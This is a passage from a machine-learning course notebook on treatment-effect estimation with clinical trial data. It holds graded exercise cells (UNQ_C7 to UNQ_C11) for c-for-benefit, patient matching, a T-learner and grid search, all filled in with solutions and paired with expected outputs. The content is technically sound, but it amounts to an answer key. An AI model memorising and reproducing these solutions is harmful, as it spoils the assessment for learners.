# <font size="3" color="darkgreen"><b>Click here for Hints!</b></font>
# </summary>
# <p>
# <ul>
# <li>A pair of patients in this case are two patients whose data are used to represent a single patient.</li>
# <li> A pair of pairs is similar to what you think of as just a "pair" in the course 2 concordance index. It's a pair of pairs of patients (four patients total).</li>
# <li>Each patient is represented by a tuple of two values. The first value is the predicted risk reduction, and the second is the patient's outcome.</li>
# <li>observed benefit: for each patient pair, the first patient is the one from the control arm (no treatment), and the second in the pair is the one who received treatment. Observed benefit is either 0 (no effect), 1 (treatment helped: the untreated patient died while the treated one survived), or -1 (treatment harmed)</li>
# <li>predicted benefit: for each patient pair, take the mean of the two predicted benefits. This is the first value in each patient's tuple.</li>
# <li>permissible pair of pairs: observed benefit is different between the two pairs of pairs of patients.</li>
# <li>concordant pair: the observed benefit and predicted benefit of pair 1 are both less than those for pair 2; or, the observed and predicted benefit of pair 1 are both greater than those for pair 2. Also, it should be a permissible pair of pairs.</li>
# <li>Risk tie: the predicted benefits of both pairs are equal, and it's also a permissible pair of pairs.</li>
# </ul>
# </p>
#
# In[30]:
# UNQ_C7 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def c_for_benefit_score(pairs):
    """
    Compute the c-statistic-for-benefit from matched patient pairs.

    Args:
        pairs (list of tuples): each element is a (control, treated)
            pair of individuals, the first from the control arm and the
            second from the treatment arm. Each individual
            p = (pred_outcome, actual_outcome) is a tuple of their
            predicted outcome and actual outcome.

    Returns:
        cstat (float): c-statistic-for-benefit computed from pairs.
    """
    # Observed benefit for a (control_outcome, treated_outcome) pair:
    # 1 means treatment helped, -1 means it harmed, 0 means no effect.
    obs_benefit_dict = {
        (0, 0): 0,
        (0, 1): -1,
        (1, 0): 1,
        (1, 1): 0,
    }

    # Observed benefit and mean predicted benefit for every pair.
    obs_benefit = []
    pred_benefit = []
    for first, second in pairs:
        obs_benefit.append(obs_benefit_dict[(first[1], second[1])])
        pred_benefit.append(np.mean([first[0], second[0]]))

    concordant_count = 0
    permissible_count = 0
    risk_tie_count = 0

    # Compare every pair of pairs exactly once.
    num_pairs = len(pairs)
    for i in range(num_pairs):
        for j in range(i + 1, num_pairs):
            # Only pairs-of-pairs with unequal observed benefit count.
            if obs_benefit[i] == obs_benefit[j]:
                continue
            permissible_count += 1
            if pred_benefit[i] == pred_benefit[j]:
                # Tied predictions earn half credit.
                risk_tie_count += 1
            elif (pred_benefit[i] > pred_benefit[j]) == (obs_benefit[i] > obs_benefit[j]):
                # Predicted ordering agrees with observed ordering.
                concordant_count += 1

    # c-statistic-for-benefit: concordant plus half the ties, over permissible.
    return (concordant_count + 0.5 * risk_tie_count) / permissible_count
# **Test Case**
# In[31]:
# NOTE(review): hand-checkable example; each pair holds two patients as
# (predicted ARR, outcome) tuples.
print("TEST CASE")
tmp_pairs = [((0.64, 1), (0.54, 0)),
((0.44, 0),(0.40, 1)),
((0.56, 1), (0.74, 0)),
((0.22,0),(0.22,1)),
((0.22,1),(0.22,0))]
print(f"pairs: {tmp_pairs}")
tmp_cstat = c_for_benefit_score(tmp_pairs)
print(f"Output: {tmp_cstat:.4f}")
# ##### Expected Output
#
# ```CPP
# TEST CASE
# pairs: [((0.64, 1), (0.54, 0)), ((0.44, 0), (0.4, 1)), ((0.56, 1), (0.74, 0)), ((0.22, 0), (0.22, 1)), ((0.22, 1), (0.22, 0))]
# Output: 0.7500
# ```
# <a name='ex-08'></a>
# ### Exercise 8: Create patient pairs and calculate c-for-benefit
#
# You will implement the function `c_statistic`, which prepares the patient data and uses the c-for-benefit score function to calculate the c-for-benefit:
#
# - Take as input:
# - The predicted risk reduction `pred_rr` (ARR)
# - outcomes `y` (1 for death, 0 for no death)
# - treatments `w` (1 for treatment, 0 for no treatment)
# - Collect the predicted risk reduction, outcomes and treatments into tuples, one tuple for each patient.
# - Filter one list of tuples where patients did not receive treatment.
# - Filter another list of tuples where patients received treatment.
#
# - Make sure that there is one treated patient for each untreated patient.
# - If there are fewer treated patients, randomly sample a subset of untreated patients, one for each treated patient.
# - If there are fewer untreated patients, randomly sample a subset of treated patients, one for each untreated patient.
#
# - Sort treated patients by their predicted risk reduction, and similarly sort the untreated patients by predicted risk reduction.
# - This allows you to match the treated patient with the highest predicted risk reduction with the untreated patient with the highest predicted risk reduction. Similarly, the second highest treated patient is matched with the second highest untreated patient.
#
# - Create pairs of treated and untreated patients.
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints</b></font>
# </summary>
# <p>
# <ul>
# <li> Use zip(a,b,c) to create tuples from two or more lists of equal length, and use list(zip(a,b,c)) to store that as a list data type.</li>
# <li> Use filter(lambda x: x[0] == True, some_list) to filter a list (such as a list of tuples) so that the 0th item in each tuple is equal to True. Cast the result as a list using list(filter(lambda x: x[0] == True, some_list)) </li>
# <li>Use random.sample(some_list, sub_sample_length) to sample a subset from a list without replacement.</li>
# <li>Use sorted(some_list, key=lambda x: x[1]) to sort a list of tuples by their value in index 1.</li>
# </ul>
# </p>
#
# In[32]:
# UNQ_C8 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def c_statistic(pred_rr, y, w, random_seed=0):
    """
    Return concordance-for-benefit, the proportion of all matched pairs with
    unequal observed benefit, in which the patient pair receiving greater
    treatment benefit was predicted to do so.

    Args:
        pred_rr (array): array of predicted risk reductions
        y (array): array of true outcomes (1 = death, 0 = no death)
        w (array): array of true treatments (1 = treated, 0 = control)
        random_seed (int): seed for the subsampling step

    Returns:
        cstat (float): calculated c-stat-for-benefit
    """
    assert len(pred_rr) == len(w) == len(y)
    random.seed(random_seed)

    # Collect pred_rr, y, and w into one tuple per patient.
    tuples = list(zip(pred_rr, y, w))

    # Split patients by actual treatment assignment.
    # FIX: the original bound w == True to a variable named `untreated`
    # (and vice versa); the names now match what the lists hold.
    treated = list(filter(lambda x: x[2] == True, tuples))
    control = list(filter(lambda x: x[2] == False, tuples))

    # Randomly subsample the larger arm so every patient can be matched
    # one-to-one across arms.
    if len(control) < len(treated):
        treated = random.sample(treated, k=len(control))
    if len(treated) < len(control):
        control = random.sample(control, k=len(treated))
    assert len(control) == len(treated)

    # Sort each arm by predicted risk reduction so the k-th
    # highest-benefit control patient is matched with the k-th
    # highest-benefit treated patient.
    control = sorted(control, key=lambda x: x[0])
    treated = sorted(treated, key=lambda x: x[0])

    # Each matched pair is (control patient, treated patient) — the order
    # c_for_benefit_score documents and expects.
    pairs = list(zip(control, treated))

    # Calculate the c-for-benefit over the matched pairs.
    cstat = c_for_benefit_score(pairs)
    return cstat
# In[33]:
# Test
# NOTE(review): toy arrays — 4 control patients (w=0) and 5 treated (w=1);
# the treated arm is subsampled down to 4 with the default seed.
tmp_pred_rr = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]
tmp_y = [0,1,0,1,0,1,0,1,0]
tmp_w = [0,0,0,0,1,1,1,1,1]
tmp_cstat = c_statistic(tmp_pred_rr, tmp_y, tmp_w)
print(f"C-for-benefit calculated is {tmp_cstat}")
# ##### Expected output
#
# ```CPP
# C-for-benefit calculated is 0.6
# ```
# ### Predicted risk reduction
# In order to compute the c-statistic-for-benefit for any of your models, you need to compute predicted risk reduction from treatment (predicted risk reduction is the input `pred_rr` to the c-statistic function).
#
# - The easiest way to do this in general is to create a version of the data where the treatment variable is False and a version where it is True.
# - Then take the difference $\text{pred_RR} = p_{control} - p_{treatment}$
#
# We've implemented this for you.
# In[34]:
def treatment_control(X):
    """Return (treatment, control) copies of X with TRTMT forced to 1 and 0."""
    # Deep copies so the caller's dataframe is never mutated.
    X_treatment = X.copy(deep=True)
    X_treatment.loc[:, 'TRTMT'] = 1
    X_control = X.copy(deep=True)
    X_control.loc[:, 'TRTMT'] = 0
    return X_treatment, X_control
def risk_reduction(model, data_treatment, data_control):
    """Predicted risk reduction per row: control risk minus treatment risk."""
    # Column 1 of predict_proba holds P(death).
    p_treatment = model.predict_proba(data_treatment)[:, 1]
    p_control = model.predict_proba(data_control)[:, 1]
    return p_control - p_treatment
# Now let's compute the predicted risk reductions of the logistic regression model on the test set.
# In[35]:
# Predicted ARR on the test set: P(death | control) - P(death | treatment).
X_test_treated, X_test_untreated = treatment_control(X_test)
rr_lr = risk_reduction(lr, X_test_treated, X_test_untreated)
# Before we evaluate the c-statistic-for-benefit, let's look at a histogram of predicted ARR.
# In[36]:
plt.hist(rr_lr, bins='auto')
plt.title("Histogram of Predicted ARR using logistic regression")
plt.ylabel("count of patients")
plt.xlabel("ARR")
plt.show()
# Note that although it predicts different absolute risk reduction, it never predicts that the treatment will adversely impact risk. This is because the odds ratio of treatment is less than 1, so the model always predicts a decrease in the baseline risk. Run the next cell to compute the c-statistic-for-benefit on the test data.
# In[37]:
tmp_cstat_test = c_statistic(rr_lr, y_test, X_test.TRTMT)
print(f"Logistic Regression evaluated by C-for-Benefit: {tmp_cstat_test:.4f}")
# ##### Expected Output
# ```CPP
# Logistic Regression evaluated by C-for-Benefit: 0.5412
# ```
# Recall that a c statistic ranges from 0 to 1, and is closer to 1 when the model being evaluated is doing a good job with its predictions.
#
# You can see that the model is not doing a great job of predicting risk reduction, given a c-for-benefit of around 0.54.
# ### Regular c-index
# Let's compare this with the regular C-index which you've applied in previous assignments. Note that the regular c-statistic does not look at pairs of pairs of patients, and just compares one patient to another when evaluating the model's performance. So the regular c-index is evaluating the model's ability to predict overall patient risk, not necessarily measuring how well the model predicts benefit from treatment.
# In[38]:
# NOTE(review): the regular C-index scores overall risk prediction, not
# treatment-benefit prediction, so it is expected to differ from C-for-benefit.
from lifelines.utils import concordance_index
tmp_regular_cindex = concordance_index(y_test, lr.predict_proba(X_test)[:, 1])
print(f"Logistic Regression evaluated by regular C-index: {tmp_regular_cindex:.4f}")
# ##### Expected output
# ```CPP
# Logistic Regression evaluated by regular C-index: 0.7785
# ```
# You can see that even though the model accurately predicts overall risk (regular c-index), it does not necessarily do a great job predicting benefit from treatment (c-for-benefit).
# You can also visually assess the discriminative ability of the model by checking if the people it thinks benefit the most from treatment empirically (actually) experience a benefit.
#
# Since you don't have counterfactual results from individuals, you'll need to aggregate patient information in some way.
#
# You can group patients by deciles (10 groups) of risk.
# In[39]:
def quantile_benefit(X, y, arr_hat):
    """
    Empirical risk reduction within deciles of predicted benefit,
    plus the overall average risk reduction.

    Args:
        X (dataframe): features, including the 'TRTMT' indicator
        y (array): true outcomes
        arr_hat (array): predicted risk reduction per patient

    Returns:
        (pd.Series, float): per-decile empirical benefit, and the
            overall (untreated minus treated) mean outcome difference
    """
    # Copy so the caller's dataframe is untouched, then attach outcome,
    # predicted benefit, and benefit decile.
    df = X.copy(deep=True)
    df.loc[:, 'y'] = y
    df.loc[:, 'benefit'] = arr_hat
    df.loc[:, 'benefit_groups'] = pd.qcut(arr_hat, 10)
    # Untreated minus treated death rate, per predicted-benefit decile.
    untreated = df.loc[df.TRTMT == 0, :]
    treated = df.loc[df.TRTMT == 1]
    empirical_benefit = (untreated.groupby('benefit_groups').y.mean()
                         - treated.groupby('benefit_groups').y.mean())
    # Overall average benefit across all patients.
    avg_benefit = untreated.y.mean() - df.loc[df.TRTMT == 1, :].y.mean()
    return empirical_benefit, avg_benefit
def plot_empirical_risk_reduction(emp_benefit, av_benefit, model):
    """Scatter empirical RR per predicted-benefit quantile with the average RR line."""
    num_groups = len(emp_benefit)
    plt.scatter(range(num_groups), emp_benefit)
    # Label quantiles 1..N rather than 0-based positions.
    plt.xticks(range(num_groups), range(1, num_groups + 1))
    plt.title(f"Empirical Risk Reduction vs. Predicted ({model})")
    plt.ylabel("Empirical Risk Reduction")
    plt.xlabel("Predicted Risk Reduction Quantile")
    # Dashed reference line at the overall average risk reduction.
    plt.plot(range(10), [av_benefit] * 10, linestyle='--', label='average RR')
    plt.legend(loc='lower right')
    plt.show()
# Group test-set patients into deciles of predicted benefit and plot the
# empirical risk reduction per decile against the overall average.
emp_benefit, avg_benefit = quantile_benefit(X_test, y_test, rr_lr)
plot_empirical_risk_reduction(emp_benefit, avg_benefit, "Logistic Regression")
# If the model performed well, then you would see patients in the higher deciles of predicted risk reduction (on the right) also have higher empirical risk reduction (to the top).
#
# This model using logistic regression is far from perfect.
#
# Below, you'll see if you can do better using a more flexible machine learning approach.
# <a name="4"></a>
# ## 4 Machine Learning Approaches
# <a name="4-1"></a>
# ### 4.1 T-Learner
#
# Now you will see how recent machine learning approaches compare to the more standard analysis. The approach we'll look at is called [T-learner](https://arxiv.org/pdf/1706.03461.pdf).
# - "T" stands for "two".
# - The T-learner learns two different models, one for treatment risk, and another model for control risk.
# - Then takes the difference of the two risk predictions to predict the risk reduction.
#
# <a name='ex-09'></a>
# ### Exercise 9: Complete the TLearner class.
#
# - The constructor `__init__()` sets the treatment and control estimators based on the given inputs to the constructor.
# - The `predict` function takes the features and uses each estimator to predict the risk of death. Then it calculates the risk of death for the control estimator minus the risk of death from the treatment estimator, and returns this as the predicted risk reduction.
# In[40]:
# UNQ_C9 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
class TLearner():
    """
    T-Learner class.

    Holds one fitted outcome model per arm and predicts the treatment
    benefit for a subject as the difference between the two predicted
    risks (control risk minus treatment risk).

    Attributes:
        treatment_estimator (object): fitted model for treatment outcome
        control_estimator (object): fitted model for control outcome
    """

    def __init__(self, treatment_estimator, control_estimator):
        """
        Initializer for TLearner class.
        """
        self.treatment_estimator = treatment_estimator
        self.control_estimator = control_estimator

    def predict(self, X):
        """
        Return predicted risk reduction for treatment for given data matrix.

        Args:
            X (dataframe): dataframe containing features for each subject

        Returns:
            preds (np.array): predicted risk reduction for each row of X
        """
        # Column 1 of predict_proba is the probability of the positive
        # (death) class for each subject.
        control_risk = self.control_estimator.predict_proba(X)[:, 1]
        treatment_risk = self.treatment_estimator.predict_proba(X)[:, 1]
        # Positive values mean treatment is predicted to lower the risk.
        return control_risk - treatment_risk
# ### Tune the model with grid search
#
# In order to tune your two models, you will use grid search to find the desired parameters.
# - You will use a validation set to evaluate the model on different parameters, in order to avoid overfitting to the training set.
#
# To test models on all combinations of hyperparameters, you can first list out all of the values in a list of lists.
# For example:
# ```CPP
# hyperparams = {
# 'n_estimators': [10, 20],
# 'max_depth': [2, 5],
# 'min_samples_leaf': [0.1, 0.2],
# 'random_state': [0]
# }
# ```
# You can generate a list like this:
# ```CPP
# [[10, 20],
# [2, 5],
# [0.1, 0.2]
# ]
# ```
#
# Next, you can get all combinations of the hyperparameter values:
# ```CPP
# [(10, 2, 0.1),
# (10, 2, 0.2),
# (10, 5, 0.1),
# (10, 5, 0.2),
# (20, 2, 0.1),
# (20, 2, 0.2),
# (20, 5, 0.1),
# (20, 5, 0.2)]
# ```
#
# To feed the hyperparameters into an random forest model, you can use a dictionary, so that you do not need to hard code the parameter names.
# For example, instead of
# ```CPP
# RandomForestClassifier(n_estimators= 20, max_depth=5, min_samples_leaf=0.2)
# ```
#
# You have more flexibility if you create a dictionary and pass it into the model.
# ```CPP
# args_d = {'n_estimators': 20, 'max_depth': 5, 'min_samples_leaf': 0.2}
# RandomForestClassifier(**args_d)
# ```
# This allows you to pass in a hyperparameter dictionary for any hyperpameters, not just `n_estimators`, `max_depth`, and `min_samples_leaf`.
#
# So you'll find a way to generate a list of dictionaries, like this:
# ```CPP
# [{'n_estimators': 10, 'max_depth': 2, 'min_samples_leaf': 0.1},
# {'n_estimators': 10, 'max_depth': 2, 'min_samples_leaf': 0.2},
# {'n_estimators': 10, 'max_depth': 5, 'min_samples_leaf': 0.1},
# {'n_estimators': 10, 'max_depth': 5, 'min_samples_leaf': 0.2},
# {'n_estimators': 20, 'max_depth': 2, 'min_samples_leaf': 0.1},
# {'n_estimators': 20, 'max_depth': 2, 'min_samples_leaf': 0.2},
# {'n_estimators': 20, 'max_depth': 5, 'min_samples_leaf': 0.1},
# {'n_estimators': 20, 'max_depth': 5, 'min_samples_leaf': 0.2}]
# ```
#
# Notice how the values in both the list of tuples and list of dictionaries are in the same order as the original hyperparams dictionary. For example, the first value in each is n_estimators, then max_depth, and then min_samples_leaf:
# ```CPP
# # list of lists
# (10, 2, 0.1)
#
# # list of dictionaries
# {'n_estimators': 10, 'max_depth': 2, 'min_samples_leaf': 0.1}
# ```
#
#
#
# Then for each dictionary of hyperparams:
# - Train a model.
# - Use the regular concordance index to compare their performances.
# - Identify and return the best performing model.
# <a name='ex-10'></a>
# ### Exercise 10: hold out grid search
#
# Implement hold out grid search.
# ##### Note
# In this case, you are not going to apply k-fold cross validation. Since `sklearn.model_selection.GridSearchCV()` applies k-fold cross validation, you won't be using this to perform grid search, and you will implement your own grid search.
#
# Please see the hints if you get stuck.
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints</b></font>
# </summary>
# <p>
# <ul>
# <li>You can use the .items() or .values() method of a dictionary to get its key, value pairs or just values. Use a list() to store them inside a list.</li>
# <li>To get all combinations of the hyperparams, you can use itertools.product(*args_list), where args_list is a list object.</li>
# <li>To generate the list of dictionaries, loop through the list of tuples.</li>
# </ul>
# </p>
#
# In[41]:
# UNQ_C10 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def holdout_grid_search(clf, X_train_hp, y_train_hp, X_val_hp, y_val_hp, hyperparam, verbose=False):
    '''
    Conduct hyperparameter grid search on hold out validation set. Use holdout validation.
    Hyperparameters are input as a dictionary mapping each hyperparameter name to the
    range of values they should iterate over. Use the cindex function as your evaluation
    function.

    Input:
        clf: sklearn classifier
        X_train_hp (dataframe): dataframe for training set input variables
        y_train_hp (dataframe): dataframe for training set targets
        X_val_hp (dataframe): dataframe for validation set input variables
        y_val_hp (dataframe): dataframe for validation set targets
        hyperparam (dict): hyperparameter dictionary mapping hyperparameter
                           names to range of values for grid search

    Output:
        best_estimator (sklearn classifier): fitted sklearn classifier with best performance on
                                             validation set
        best_hyperparam (dict): hyperparameters of the best estimator
    '''
    best_estimator = None
    best_hyperparam = {}
    # Track the best validation c-index seen so far.
    best_score = 0.0

    # Candidate value ranges, in the dictionary's key order.
    param_names = list(hyperparam.keys())
    hyper_param_l = [hyperparam[name] for name in param_names]

    # Cartesian product: one tuple of values per candidate configuration.
    combination_l_of_t = list(itertools.product(*hyper_param_l))

    # Re-package each value tuple as {name: value} so it can be splatted
    # directly into the classifier constructor.
    combination_l_of_d = [
        dict(zip(param_names, values)) for values in combination_l_of_t
    ]

    # Fit one candidate per configuration and keep the best by c-index.
    for param_d in combination_l_of_d:
        candidate = clf(**param_d)
        candidate.fit(X_train_hp, y_train_hp)
        preds = candidate.predict_proba(X_val_hp)
        estimator_score = concordance_index(y_val_hp, preds[:, 1])
        if estimator_score > best_score:
            best_score = estimator_score
            best_estimator = candidate
            best_hyperparam = param_d

    if verbose:
        print("hyperparam:")
        display(hyperparam)
        print("hyper_param_l")
        display(hyper_param_l)
        print("combination_l_of_t")
        display(combination_l_of_t)
        print(f"combination_l_of_d")
        display(combination_l_of_d)
        print(f"best_hyperparam")
        display(best_hyperparam)
        print(f"best_score: {best_score:.4f}")

    return best_estimator, best_hyperparam
# In[42]:
# Test
n = X_dev.shape[0]

# Simple 80/20 holdout split of the dev set (rows kept in order).
tmp_X_train = X_dev.iloc[:int(n*0.8), :]
tmp_X_val = X_dev.iloc[int(n*0.8):, :]
tmp_y_train = y_dev[:int(n*0.8)]
tmp_y_val = y_dev[int(n*0.8):]

# Small grid so the verbose output stays readable.
hyperparams = {
    'n_estimators': [10, 20],
    'max_depth': [2, 5],
    'min_samples_leaf': [0.1, 0.2],
    'random_state': [0]
}

from sklearn.ensemble import RandomForestClassifier

# holdout_grid_search returns (best_estimator, best_hyperparam); unpack both
# instead of binding the whole tuple to a single, misleading name.
control_model, control_hyperparams = holdout_grid_search(RandomForestClassifier,
                                                         tmp_X_train, tmp_y_train,
                                                         tmp_X_val, tmp_y_val, hyperparams, verbose=True)
# T-Learner is a convenient framework because it does not restrict your choice of base learners.
# - You will use random forests as the base learners, but are able to choose another model as well.
# ##### Expected output
#
# ```CPP
# hyperparam:
# {'n_estimators': [10, 20],
# 'max_depth': [2, 5],
# 'min_samples_leaf': [0.1, 0.2],
# 'random_state': [0]}
# hyper_param_l
# [[10, 20], [2, 5], [0.1, 0.2], [0]]
# combination_l_of_t
# [(10, 2, 0.1, 0),
# (10, 2, 0.2, 0),
# (10, 5, 0.1, 0),
# (10, 5, 0.2, 0),
# (20, 2, 0.1, 0),
# (20, 2, 0.2, 0),
# (20, 5, 0.1, 0),
# (20, 5, 0.2, 0)]
# combination_l_of_d
# [{'n_estimators': 10,
# 'max_depth': 2,
# 'min_samples_leaf': 0.1,
# 'random_state': 0},
# {'n_estimators': 10,
# 'max_depth': 2,
# 'min_samples_leaf': 0.2,
# 'random_state': 0},
# {'n_estimators': 10,
# 'max_depth': 5,
# 'min_samples_leaf': 0.1,
# 'random_state': 0},
# {'n_estimators': 10,
# 'max_depth': 5,
# 'min_samples_leaf': 0.2,
# 'random_state': 0},
# {'n_estimators': 20,
# 'max_depth': 2,
# 'min_samples_leaf': 0.1,
# 'random_state': 0},
# {'n_estimators': 20,
# 'max_depth': 2,
# 'min_samples_leaf': 0.2,
# 'random_state': 0},
# {'n_estimators': 20,
# 'max_depth': 5,
# 'min_samples_leaf': 0.1,
# 'random_state': 0},
# {'n_estimators': 20,
# 'max_depth': 5,
# 'min_samples_leaf': 0.2,
# 'random_state': 0}]
# best_hyperparam
# {'n_estimators': 10,
# 'max_depth': 2,
# 'min_samples_leaf': 0.1,
# 'random_state': 0}
# best_score: 0.5928
# ```
# <a name='ex-11'></a>
# ### Exercise 11: Training and validation, treatment and control splits
#
# - Unlike logistic regression, the machine learning algorithms used for base learners will generally require hyperparameter tuning, which means that you need to split your dev set into a training and validation set.
# - You need to also split each of the training and validation sets into *treatment* and *control* groups to train the treatment and control base learners of the T-Learner.
#
# The function below takes in a dev dataset and splits it into training and validation sets for treatment and control models, respectively.
# Complete the implementation.
#
# #### Note
# - The input X_train and X_val have the 'TRTMT' column. Please remove the 'TRTMT' column from the treatment and control features that the function returns.
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints</b></font>
# </summary>
# <p>
# <ul>
# <li> To drop a column, set the axis to 1 when calling pandas.DataFrame.drop(...). Axis=0 is used to drop a row by its index label)</li>
# </ul>
# </p>
# In[43]:
# UNQ_C11 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def treatment_dataset_split(X_train, y_train, X_val, y_val):
    """
    Separate treated and control individuals in training
    and testing sets. Remember that returned
    datasets should NOT contain the 'TRTMT' column!

    Args:
        X_train (dataframe): dataframe for subject in training set
        y_train (np.array): outcomes for each individual in X_train
        X_val (dataframe): dataframe for subjects in validation set
        y_val (np.array): outcomes for each individual in X_val

    Returns:
        X_treat_train (df): training set for treated subjects
        y_treat_train (np.array): labels for X_treat_train
        X_treat_val (df): validation set for treated subjects
        y_treat_val (np.array): labels for X_treat_val
        X_control_train (df): training set for control subjects
        y_control_train (np.array): labels for X_control_train
        X_control_val (np.array): validation set for control subjects
        y_control_val (np.array): labels for X_control_val
    """
    ### START CODE HERE (REPLACE INSTANCES OF 'None' with your code) ###
    # Compute each boolean treatment mask once so features and labels are
    # always selected with the same, consistent condition (the original
    # mixed `==True`, `==1`, and `==False`, which is easy to get wrong).
    train_treated = X_train.TRTMT == 1
    val_treated = X_val.TRTMT == 1

    # Treatment arm: keep treated rows, then drop the 'TRTMT' indicator.
    X_treat_train = X_train[train_treated].drop('TRTMT', axis=1)
    y_treat_train = y_train[train_treated]
    X_treat_val = X_val[val_treated].drop('TRTMT', axis=1)
    y_treat_val = y_val[val_treated]

    # --------------------------------------------------------------------------------------------
    # Control arm: the complement of the treated mask.
    X_control_train = X_train[~train_treated].drop('TRTMT', axis=1)
    y_control_train = y_train[~train_treated]
    X_control_val = X_val[~val_treated].drop('TRTMT', axis=1)
    y_control_val = y_val[~val_treated]
    ### END CODE HERE ###

    return (X_treat_train, y_treat_train,
            X_treat_val, y_treat_val,
            X_control_train, y_control_train,
            X_control_val, y_control_val)
# **Test Case**
# In[44]:
# Tests
# Build a toy cohort of 100 subjects with a random binary treatment flag.
example_df = pd.DataFrame(columns = ['ID', 'TRTMT'])
example_df.ID = range(100)
example_df.TRTMT = np.random.binomial(n=1, p=0.5, size=100)
treated_ids = set(example_df[example_df.TRTMT==1].ID)
# Use the treatment flag itself as the label so the splits are easy to verify.
example_y = example_df.TRTMT.values
example_train, example_val, example_y_train, example_y_val = train_test_split(
    example_df, example_y, test_size = 0.25, random_state=0
)
(x_treat_train, y_treat_train,
 x_treat_val, y_treat_val,
 x_control_train, y_control_train,
 x_control_val, y_control_val) = treatment_dataset_split(example_train, example_y_train,
                                                         example_val, example_y_val)
print("Tests")
pass_flag = True
# Check 1: the four splits together account for every subject.
pass_flag = (len(x_treat_train) + len(x_treat_val) + len(x_control_train) +
             len(x_control_val) == 100)
print(f"\nDidn't lose any subjects: {pass_flag}")
# Check 2: the TRTMT column was dropped from every split.
pass_flag = (("TRTMT" not in x_treat_train) and ("TRTMT" not in x_treat_val) and
             ("TRTMT" not in x_control_train) and ("TRTMT" not in x_control_val))
print(f"\nTRTMT not in any splits: {pass_flag}")
# Check 3: the treated splits contain exactly the treated subject IDs.
split_treated_ids = set(x_treat_train.ID).union(set(x_treat_val.ID))
pass_flag = (len(split_treated_ids.union(treated_ids)) == len(treated_ids))
print(f"\nTreated splits have all treated patients: {pass_flag}")
# Check 4: no treated subject leaked into the control splits.
split_control_ids = set(x_control_train.ID).union(set(x_control_val.ID))
pass_flag = (len(split_control_ids.intersection(treated_ids)) == 0)
print(f"\nAll subjects in control split are untreated: {pass_flag}")
# Checks 5 & 6: train/val splits within each arm are disjoint.
pass_flag = (len(set(x_treat_train.ID).intersection(x_treat_val.ID)) == 0)
print(f"\nNo overlap between treat_train and treat_val: {pass_flag}")
pass_flag = (len(set(x_control_train.ID).intersection(x_control_val.ID)) == 0)
print(f"\nNo overlap between control_train and control_val: {pass_flag}")
print(f"\n--> Expected: All statements should be True")
# You will now train a T-learner model on the patient data, and evaluate its performance using the c-for-benefit.
#
# First, get the training and validation sets.
# In[45]:
# Import the random forest classifier to be used as the base learner
from sklearn.ensemble import RandomForestClassifier
# Split the dev data into train and validation sets
X_train, X_val, y_train, y_val = train_test_split(X_dev,
y_dev,
test_size = 0.25,
random_state = 0)
# Split the training set into a treatment and control set.
# Similarly, split the validation set into a treatment and control set.
# In[46]:
# get treatment and control arms of training and validation sets
(X_treat_train, y_treat_train,
X_treat_val, y_treat_val,
X_control_train, y_control_train,
X_control_val, y_control_val) = treatment_dataset_split(X_train, y_train,
X_val, y_val)
# Choose a set of hyperparameters to perform grid search and find the best model.
# - Please first use these given hyperparameters so that you can get the same c-for-benefit calculation at the end of this exercise.
# - Afterwards, we encourage you to come back and try other ranges for these hyperparameters.
#
# ```CPP
# # Given hyperparams to do grid search
# hyperparams = {
# 'n_estimators': [100, 200],
# 'max_depth': [2, 5, 10, 40, None],
# 'min_samples_leaf': [1, 0.1, 0.2],
# 'random_state': [0]
# }
# ```
# In[47]:
# hyperparameter grid (we'll use the same one for both arms for convenience)
# Note that we set random_state to zero
# in order to make the output consistent each time it's run.
hyperparams = {
'n_estimators': [100, 200],
'max_depth': [2, 5, 10, 40, None],
'min_samples_leaf': [1, 0.1, 0.2],
'random_state': [0]
}
# Train the treatment base learner.
# - Perform grid search to find a random forest classifier and associated hyperparameters with the best c-index (the regular c-index).
# In[48]:
# perform grid search with the treatment data to find the best model
treatment_model, best_hyperparam_treat = holdout_grid_search(RandomForestClassifier,
X_treat_train, y_treat_train,
X_treat_val, y_treat_val, hyperparams)
# Train the control base learner.
# In[49]:
# perform grid search with the control data to find the best model
control_model, best_hyperparam_ctrl = holdout_grid_search(RandomForestClassifier,
X_control_train, y_control_train,
X_control_val, y_control_val, hyperparams)
# Combine the treatment and control base learners into the T-learner.
# In[50]:
# Save the treatment and control models into an instance of the TLearner class
t_learner = TLearner(treatment_model, control_model)
# For the validation set, predict each patient's risk reduction.
# In[51]:
# Use the t-learner to predict the risk reduction for patients in the validation set
rr_t_val = t_learner.predict(X_val.drop(['TRTMT'], axis=1))
print(f"X_val num of patients {X_val.shape[0]}")
print(f"rr_t_val num of patient predictions {rr_t_val.shape[0]}")
# Now plot a histogram of your predicted risk reduction on the validation set.
# In[55]:
plt.hist(rr_t_val, bins='auto')
plt.title("Histogram of Predicted ARR, T-Learner, validation set")
plt.xlabel('predicted risk reduction')
plt.ylabel('count of patients')
plt.show()
# Notice when viewing the histogram that predicted risk reduction can be negative.
# - This means that for some patients, the T-learner predicts that treatment will actually increase their risk (negative risk reduction).
# - The T-learner is more flexible compared to the logistic regression model, which only predicts non-negative risk reduction for all patients (view the earlier histogram of the 'predicted ARR' histogram for the logistic regression model, and you'll see that the possible values are all non-negative).
# Now plot an empirical risk reduction plot for the validation set examples.
# In[56]:
empirical_benefit, avg_benefit = quantile_benefit(X_val, y_val, rr_t_val)
plot_empirical_risk_reduction(empirical_benefit, avg_benefit, 'T Learner [val set]')
# Recall that the predicted risk reduction is along the horizontal axis and the vertical axis is the empirical (actual risk reduction).
#
# A good model would predict a lower risk reduction for patients with actual lower risk reduction. Similarly, a good model would predict a higher risk reduction for patients with actual higher risk reduction (imagine a diagonal line going from the bottom left to the top right of the plot).
#
# The T-learner seems to be doing a bit better (compared to the logistic regression model) at differentiating between the people who would benefit most treatment and the people who would benefit least from treatment.
# Compute the C-statistic-for-benefit on the validation set.
# In[54]:
c_for_benefit_tlearner_val_set = c_statistic(rr_t_val, y_val, X_val.TRTMT)
print(f"C-for-benefit statistic of T-learner on val set: {c_for_benefit_tlearner_val_set:.4f}")
# ##### Expected output
#
# ```CPP
# C-for-benefit statistic of T-learner on val set: 0.5043
# ```
